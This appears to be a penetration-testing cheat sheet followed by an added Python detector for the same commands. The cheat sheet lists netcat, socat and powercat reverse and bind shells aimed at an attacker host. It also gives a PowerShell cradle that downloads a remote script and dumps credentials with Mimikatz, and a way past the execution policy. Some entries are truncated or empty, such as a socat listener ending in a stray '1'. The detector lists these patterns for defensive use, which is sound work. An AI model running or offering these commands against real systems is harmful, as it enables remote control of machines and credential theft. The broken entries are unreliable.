3) Practice tools
nc
1.Transferring Files
Receiver:
nc -lvvp 4444 > receive.file
Sender:
nc -vv 10.0.1.1 4444 < send.file
2.Reverse Shell
victim:
nc -vv 10.0.1.1 4444 -e /bin/bash
evil:
nc -lvvp 4444
3.Bind Shells
socat
1.File Transfers
Sender:
sudo socat TCP4-LISTEN:4444,fork file:localfilename
Serves the contents of the local file localfilename to any program that connects to the port
Receiver:
socat TCP4:10.0.1.1:4444 file:receivefilename,create
Receives the file from the listener and saves it in the current directory as receivefilename
2.Reverse Shells
victim:
socat TCP4:10.0.1.1:4444 EXEC:/bin/bash
evil:
sudo socat TCP4-LISTEN:4444 1
3.Bind Shells
powershell&powercat
1.1 PowerShell File Transfers
Download a file from a remote address with PowerShell
powershell -c "(New-Object system.net.webclient).downloadfile('http://10.0.1.1/evil.ps','./evil.ps')"
1.2 PowerShell Reverse Shells
1.3 PowerShell Bind Shells
2.1 Powercat File Transfers
powercat -c 10.0.1.1 -p 4444 -i fullfilepath -v
powercat -l -p 4444 -of filepath -v
2.2 Powercat Reverse Shells
victim:
powercat -c 10.0.1.1 -p 4444 -e cmd.exe
or
powercat -c 10.0.1.1 -p 4444
evil:
nc -lvvp 4444
or
powercat -l -p 4444 -ep
-ep returns a PowerShell shell directly
2.3 Powercat Bind Shells
victim:
powercat -l -p 4444 -e cmd.exe -v
evil:
nc -vv 10.0.1.1 4444
2.4 Powercat Stand-Alone Payloads
- Bypass the execution-policy restriction
powercat -c 10.0.1.1 -p 4444 -e cmd.exe -ge > encodereverseshell.ps1
PowerShell -ExecutionPolicy Bypass -File encodereverseshell.ps1
- Bypass the restriction and run a PowerShell script fetched from a remote address
powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.1/payload');Invoke-Mimikatz -DumpCreds"
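Added defender-side example, not part of the original notes: a small detector that turns the command-line patterns from this cheat sheet (nc -e, socat EXEC:, powercat -e/-ep, the IEX/DownloadString cradle, -ExecutionPolicy Bypass) into rules and runs them over constructed process-creation events. The event records, rule names and severities are all assumptions made for the example; a bare nc listener is rated low because it may only be a file transfer.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (not real telemetry), shaped like the
# command-line field a Sysmon/auditd/EDR feed hands an analyst.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": "nc -vv 10.0.1.1 4444 -e /bin/bash"},
    {"host": "ws01", "cmdline": "socat TCP4:10.0.1.1:4444 EXEC:/bin/bash"},
    {"host": "ws02", "cmdline": "powershell -c \"(New-Object system.net.webclient).downloadfile('http://10.0.1.1/evil.ps','./evil.ps')\""},
    {"host": "ws02", "cmdline": "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.1/payload')\""},
    {"host": "ws03", "cmdline": "powercat -l -p 4444 -e cmd.exe -v"},
    {"host": "ws03", "cmdline": "PowerShell -ExecutionPolicy Bypass -File encodereverseshell.ps1"},
    {"host": "ws04", "cmdline": "nc -lvvp 4444 > receive.file"},  # listener only, maybe a transfer
    {"host": "ws04", "cmdline": "ls -la /tmp"},                  # benign
]

# One rule per pattern in the cheat sheet; severity separates a shell-spawning flag
# (-e / EXEC:) from a bare listener. Names and severities are assumptions.
RULES: Dict[str, Tuple[str, re.Pattern]] = {
    "nc_exec_shell":      ("high",   re.compile(r"\bnc\b.*\s-e\s+\S+", re.I)),
    "socat_exec":         ("high",   re.compile(r"\bsocat\b.*\bEXEC:", re.I)),
    "powercat_exec":      ("high",   re.compile(r"\bpowercat\b.*\s-ep?\b", re.I)),
    "ps_download_cradle": ("high",   re.compile(r"\bIEX\b.*DownloadString\(", re.I)),
    "ps_webclient_fetch": ("medium", re.compile(r"WebClient\)\.Download(?:File|String)\(", re.I)),
    "ps_policy_bypass":   ("medium", re.compile(r"-ExecutionPolicy\s+Bypass\b", re.I)),
    "nc_listener":        ("low",    re.compile(r"\bnc\b\s+-[a-z]*l", re.I)),
}

ORDER = {"none": 0, "low": 1, "medium": 2, "high": 3}

def classify(cmdline: str) -> List[str]:
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, (_, pat) in RULES.items() if pat.search(cmdline)]

def severity(rule_names: List[str]) -> str:
    """Highest severity among the matched rules ('none' when nothing matched)."""
    return max((RULES[n][0] for n in rule_names), key=ORDER.get, default="none")

def scan_events(events, min_severity: str = "medium") -> List[Tuple[str, str, List[str]]]:
    """Return (host, cmdline, matched_rules) for events at or above min_severity."""
    hits = []
    for ev in events:
        matched = classify(ev["cmdline"])
        if ORDER[severity(matched)] >= ORDER[min_severity]:
            hits.append((ev["host"], ev["cmdline"], matched))
    return hits

if __name__ == "__main__":
    for host, cmd, rules in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {severity(rules):6} {rules}  <- {cmd}")
```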